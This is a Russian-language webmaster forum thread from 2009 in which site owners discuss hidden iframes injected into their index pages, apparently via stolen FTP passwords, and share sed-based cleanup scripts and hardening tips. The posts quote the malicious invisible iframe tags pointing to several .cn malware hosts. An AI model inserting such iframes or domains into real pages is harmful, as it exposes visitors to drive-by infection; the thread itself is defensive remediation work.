|
На страницу Пред. 1, 2, 3 След. |
|
|
| Ср Мар 18, 2009 9:37 pm |
Start Post: господи.. боже мой..  |
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21801
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
Я сегодня на одном своем сайте.. в индекс стр. внизу ифрейм на трои-поников обнаружил.
это моя машинка заражена ?
.. или хостинг был взломан ? (речь не о SG.. о других)
если моя:
это трои на лету, при закачке файлов на ФТП, вставляют в конец свой фрей?
.. они все ФТП менеджеры умеют игогокать - перехватывать?
.. или тама сначало крадуться ФТП логины/пароли . а потом уже.. со стронней машинке заливаеться ?
если не моя (сервер): что делать сразу ? - если на файлы поставить атрибуты только чтения - поможет ?
.. где бы почитать про эти вирусы.. их празнаки.. |
|
|
|
|
|
porno |
![]()
Orvas
I have never been clever |
Зарегистрирован: 26.03.2008
Сообщений: 3613
|
Обратиться по нику
|
|
|
|
![]()
DrKronos
SEO-доктор |
Зарегистрирован: 11.03.2008
Сообщений: 13024
|
Обратиться по нику
|
| DrKronos |
Ответить с цитатой | | |
|
| Цитата: |
#!/bin/sh
find . -print0 | xargs -0 grep -l 517891 > vir-list.txt
while read line
do
sed 's/:<iframe frameborder=0 border=0 height=1 width=1 src="http:\/\/517891.cn\/in.cgi?8"//g' <$line >tmp
mv tmp $line
done < vir-list.txt
|
 Вот она, смерть адалта. |
|
|
|
|
|
 Здесь могла быть ваша реклама |
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21801
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
кстати, кажеться вирь ФТП-пароли из FAR-а вытащить несмог.. только из современных ФТП манеджеров..
а если гугль заметит фрейм-вирь на сайте..
он повесит табличку..
если я через 2-3 дня отремонтирую, гугль мои права востановит.. или бан сразу.. или через сколько.. - как действовать ?
Есть такие ФТП менеджеры где криптуються данные логин/пасс.. т.е. ФТП менеджер устойчивый к таким вирям, и просто так пароли не даст.
?
#!/bin/sh
find . -print0 | xargs -0 grep -l 517891 > vir-list.txt
while read line
do
sed 's/:<iframe frameborder=0 border=0 height=1 width=1 src="http:\/\/517891.cn\/in.cgi?8"//g' <$line >tmp
mv tmp $line
done < vir-list.txt
чего этот скрипт делает ? и где его и как запустить ? |
|
|
|
|
|
porno |
![]()
Fraud
Опытный |
Зарегистрирован: 27.07.2007
Сообщений: 309
|
Обратиться по нику
|
| Fraud |
Ответить с цитатой | | |
|
У меня тоже на всех сайтах фреймы 
Меняла пароли - не помогло.
Думаю массовое заражение
На компе только файерволл стоит.... |
|
|
|
|
|
|
![]()
sydoow
V.I.P. |
Зарегистрирован: 29.06.2007
Сообщений: 8213
|
Обратиться по нику
|
|
|
|
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21801
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
У меня тоже на всех сайтах фреймы
я их видел (фреймы) только в индекс файлах.. больше негде.. а ты ?
да и то кажеться.. заражалися только те сайты, где индекс файлик в папке public_html ~~
также, взломаны были те логины/пароли которые были не в ФАРе.. а в ФАРе ничего вродеб нетрогали...
Меняла пароли - не помогло.
я сменил, мне помогло..
возможно ты просто несделил этот вирь.. и он снова "ворует"..
Думаю массовое заражение
Виндовсов или Линуксов ?
На компе только файерволл стоит....
У меня Каспер (мощный кстати пакет, тама и веб фильтры есть... - рек.
Через Касперского можно справки навести.. что за вирь и что он делает ? |
|
|
|
|
|
porno |
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21801
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
.. вставляеться фрейм на линк
wcount (.) net/com/index.php
куда писать чтоб домен заблочили ? |
|
|
|
|
|
porno |
![]()
Grab + +
Опытный |
Зарегистрирован: 19.11.2007
Сообщений: 126
|
Обратиться по нику
|
| Grab + + |
Ответить с цитатой | | |
|
итак выводы
вот здесь
| Код: |
|
sed 's/:<iframe frameborder=0 border=0 height=1 width=1 src="http:\/\/517891.cn\/in.cgi?8"//g' <$line >tmp
|
именно
под вопросом тк
| Код: |
|
sed 's/foo/bar/g' filename (standard replace command)
|
далее без экранирования через \ я получал только 0 размер файлов
в итоге мой код для html стал таким (php там немного добавлено еще)
| Код: |
#!/bin/sh
find . -name '*.html' -exec grep -l "cocacola" {} \; > vir-list.txt
while read line
do
sed 's/\<iframe\ src=\"http:\/\/homenameregistration.cn\/in.cgi\?income12\"\ width=1\ height=1\ style=\"visibility:\ hidden\"\>\<\/iframe\>\<\iframe\ src=\"http:\/\/filmlifemusicsite\.cn\/in\.cgi\?cocacola95\"\ width=1\ height=1\ style=\"visibility:\ hidden\"\>\<\/iframe\>\<iframe\ src=\"http:\/\/promixgroup\.cn\/in.cgi\?cocacola91\"\ width=1\ height=1\ style=\"visibility:\ hidden\"\>\<\/iframe\>\<iframe\ src=\"http:\/\/betstarwager\.cn\/in.cgi\?cocacola86\"\ width=1\ height=1\ style=\"visibility:\ hidden\"\>\<\/iframe\>//g' $line > tmp
mv tmp $line
done < vir-list.txt
|
в любом случае пользоваться этим надо осторожно, иначе можно потерять все, самый оптимальный подход выполнить поиск с записью в файл и если не много поправить все руками и заодно поставить chmod 444
P.S. каким методом выставляется iframe я так и не понял, шелов нет вроде нигде, пароли каждый день меняю и запускаю клиента из под sandboxie, вообщем хз |
|
|
|
|
|
|
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21801
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
.. похищение пароль было с локальной машины из почти всех фтп-менеджеров.. (Фар непробили)
для того чтоб такого больше небыло..
Есть такие ФТП менеджеры где криптуються данные логин/пасс.. т.е. ФТП менеджер устойчивый к таким вирям, и просто так пароли не даст.
спасибо. |
|
|
|
|
|
porno |
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21801
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
ну так...
Есть такие ФТП менеджеры где криптуються данные логин/пасс.. т.е. ФТП менеджер устойчивый к таким вирям, и просто так пароли не даст.
CuteFtp - напр, - имеет такую защиту ? |
|
|
|
|
|
porno |
![]()
tal
Свой |
Зарегистрирован: 23.03.2009
Сообщений: 1
|
Обратиться по нику
|
| tal |
Ответить с цитатой | | |
|
У меня на сайте в индексных файлах .html .shtml .php появилась такая [b][size=18]дрянь!!! [/size][/b] [b]iframe src="_http://mediahomenamemartvideo.cn/in.cgi?income21" width=1 height=1 style="visibility: hidden"></iframe[/b]
в 3-х экземплярах после тегов [b]титл[/b] и [b]боди[/b]
Как узнали пароли? И поможет ли смена паролей в дальнейшем? |
|
|
|
|
|
|
![]()
shhef +
V.I.P. |
Зарегистрирован: 14.09.2007
Сообщений: 7694
|
Обратиться по нику
|
| shhef + |
Ответить с цитатой | | |
|
люди добрый скажите, де оно торчит? только в индексах или еще де?
просто у меня индексы, почти все "зазендены" |
|
|
|
|
|
Облачный сервер за 5 у.е. + 10 у.е на счет при регистрации по моей ссылке. Разные страны! Лучший треккер! |
![]()
Fraud
Опытный |
Зарегистрирован: 27.07.2007
Сообщений: 309
|
Обратиться по нику
|
|
|
|
![]()
Romano
Опытный |
Зарегистрирован: 08.12.2008
Сообщений: 103
|
Обратиться по нику
|
| Romano |
Ответить с цитатой | | |
|
| Цитата: |
| CuteFtp - напр, - имеет такую защиту ?
|
в PRO версии да, в HOME не знаю...
| Цитата: |
| люди добрый скажите, де оно торчит? только в индексах или еще де?
|
бывает и на второстепенных страницах прописываются... ну это уже видимо ручная работа. |
|
|
|
|
|
Наполни свой сайт контентом и найди помощников! |
![]()
J_Geer
Опытный |
Зарегистрирован: 27.03.2006
Сообщений: 159
|
Обратиться по нику
|
| J_Geer |
Ответить с цитатой | | |
|
| Fraud писал(а): |
У меня тоже на всех сайтах фреймы
Меняла пароли - не помогло.
Думаю массовое заражение
На компе только файерволл стоит....
|
Была 1 раз така хрень на одном хосте. Менял пароли - не помогло. Помогло chmod 444 на все index.* файлы. И зазендил все index.php файлы, которые можно зендить. Фишка в том, что при добавлении этой хрени нарушается код зенда и показывается просто чистая страница, а изменение отслеживается на ура ресип-чекером. По крайней мере, у меня на хосте было так.
А антивирус на компе должен стоять обязательно, если не какой-нить *nix стоит, там вроде с этим получше... |
|
|
|
|
|
Good host. Traffic trade and Links trade. SiteMonitor |
|
|
